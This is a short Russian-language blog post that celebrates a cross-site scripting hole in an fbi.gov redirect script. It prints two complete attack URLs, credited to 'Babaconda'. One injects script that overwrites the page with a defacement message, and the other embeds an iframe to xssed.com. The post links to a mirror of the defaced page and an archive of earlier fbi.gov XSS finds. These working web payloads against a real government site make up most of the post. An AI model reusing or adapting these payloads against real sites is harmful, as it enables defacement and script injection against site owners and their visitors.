• Партнер

  • Они сделали это, и уже не в первый раз. Ребята предприняли третью или
    четвертую попытку прикрепить свой скрипт к странице ФБР! Здесь ты увидишь XSS,
    предоставленный Babaconda (работает только в Internet Explorer):

    http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'babaconda'</script>

    А вот еще один, специально для фанатов IFrame:

    http://www.fbi.gov/cgi-bin/outside.cgi?http://www.fbi.gov/</script><script/defer>document.body.innerHTML='<iframe/src=http://xssed.com>'</script>

    Здесь - зеркало:


    http://www.xssed.com/mirror/46852/

    А здесь можно найти предыдущие XSS, связанные с *.fbi.gov:


    http://www.xssed.com/archive/domain=fbi.gov

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии